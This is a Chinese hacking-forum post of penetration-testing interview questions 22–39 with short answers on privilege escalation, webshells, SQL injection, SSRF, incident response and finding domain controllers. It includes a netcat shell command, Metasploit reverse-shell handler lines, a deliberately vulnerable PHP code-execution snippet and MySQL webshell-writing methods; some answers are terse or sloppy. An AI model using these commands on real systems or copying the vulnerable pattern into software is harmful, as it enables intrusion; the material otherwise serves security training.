跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

  • 0

2020渗透测试面试问题大全(下)


HACK1949

问题

2020渗透测试面试问题大全(下)

5fe67c9d23fcc.png

22、如果给你一个网站,你的渗透测试思路是什么? 在获取书面授权的前提下。

其实这是一个非常大的话题,渗透大部分思路都是如此,而面试官是想听到你回答不一样的答案让人眼前一亮 如何才做到让人眼前一亮都需要看你的经验,把你实践的过程拿出来说,以及遇到什么问题如何解决,最终取得成果 渗透其它大同小异,而做为渗透者知识的储备、基础扎实、耐心、细心都是必不可少。

 

23、谈一谈Windows系统与Linux系统提权的思路?

Windows

Windows服务比较多所以方法也如此,最基本的就是Exp提权,数据库SQLServer、MYSQL UDF等、第三方软件提权。

除此之外提权的成功与否和在于信息收集也非常重要,你对这台服务器和管理员了解多少。

windows权限提升(二)

Linux

 

Linux也是类似,除了EXP或者高版本的内核无法提权之外,通过第三方软件和服务,除了提权也可以考虑把这台机器当跳版,

达到先进入内网安全防线最弱的地方寻找有用的信息,再迂回战术。

linux权限提升

 

Brief

枚举脚本

以root权限运行的程序

用户安装的软件

弱口令或者明文密码

只能内部访问的服务

suid和guid错误配置

滥用sudo权限

以root权限运行的脚本文件

错误的路径配置

计划任务

未挂载的文件系统

NFS共享

通过键盘记录仪窃取密码

其它有用的和提权相关的东西

内核提权

 

24、列举出您所知道的所有开源组件高危漏洞(十个以上)

Tomcat

Nginx

Apache

Hadhoop

Docker

Jenkins

Zenoss

Jboss

MongoDB

Redis

GlassFish

 

25、反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么?

nc -lvvp 7777 -e /bin/bash

bash是交互式,否则像useradd无法执行交互

 

26、CMD命令行如何查询远程终端开放端口

tasklist /svc

netstat -ano

 

27、服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路

可以读取IIS信息,知道路径,如果像WAMMP类似构建,通过@@datadir知道数据库路径也可以猜测网站路径。

或者直接写Shell

 

28、请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句

select COLUMN_NAME from information_schema.COLUMNS where table_name = 'your_table_name' and table_schema = 'your_db_name';

 

29、下面这段代码存在漏洞吗?如果存在请说出存在什么漏洞并利用

http://www.exp.com/1.php  

<?php  

$s_func = $_GET['s_func'];

$info = $_GET['info'];

$s_func($info);

?>

代码执行,通过assert调用

 

30、udf提权

MySQL可以自定义函数,通过自定义函数做到类似xp_cmdshell效果

 

31、SQL头注入点

UserAgent

Referer

Cookie

X-FOR-I

32、php中命令执行涉及到的函数

eval()

assert()

system()

exec()

shell_exec()

 

33、SSRF漏洞的成因 防御 绕过

模拟服务器对其它资源进行请求 IP探测,如果想漏洞利用必需要构造好Payload 禁止跳转,限制协议,内外网限制,URL限制 针对IP格式

 

34、mysql写shell有几种方法

outfile、dumpfile、开启log写webshell

 

35、Metasploit 打开反向监听的命令

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

 

36、应急响应的步骤

1.准备已经编译好的工具以及取证分析等工具干净可靠放U盘

2.初步判断事件的类型,是被入侵、ddos还是其它的原因

3.首先抑制范围、影响范围,隔离使受害面不继续扩大。

4.寻找原因,封堵攻击源。

5.把业务恢复至正常水平

6.监控有无异常,报告、管理环节的自省和改进措施。

 

37、有哪些反向代理的工具?

reGeirg、EW、lcx、Ngrok、frp

 

38、有什么比较曲折的渗透经历

这个问题想知道你工作渗透到什么样的程度,只是简单的漏扫搬砖,还是有毅力坚持完成整个渗透,如:对目标不放弃,坚持一个月最终通过各种手段,曲折的过程拿下目标。

 

39、UpdateTime:2019.5.11

 

怎么查找域控

 

方法有很多 

 

1.通过DNS查询

 

dig -t SRV _gc._tcp.lab.ropnop.com  

 

dig -t SRV _ldap._tcp.lab.ropnop.com  

 

dig -t SRV _kerberos._tcp.lab.ropnop.com  

 

dig -t SRV _kpasswd._tcp.lab.ropnop.com

 

2.端口扫描

 

域服务器都会开启389端口,所以可以通过扫描端口进行识别。

 

3.其实很多域环境里,DNS服务器就是域控制根本不需要怎么找。

 

4.各种命令

 

dsquery

 

net group "Domain controllers"

 

nltest /DCLIST:pentest.com

......

链接帖子
意见的链接
分享到其他网站

这个问题有0个答案

推荐的帖子

此问题没有答案

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...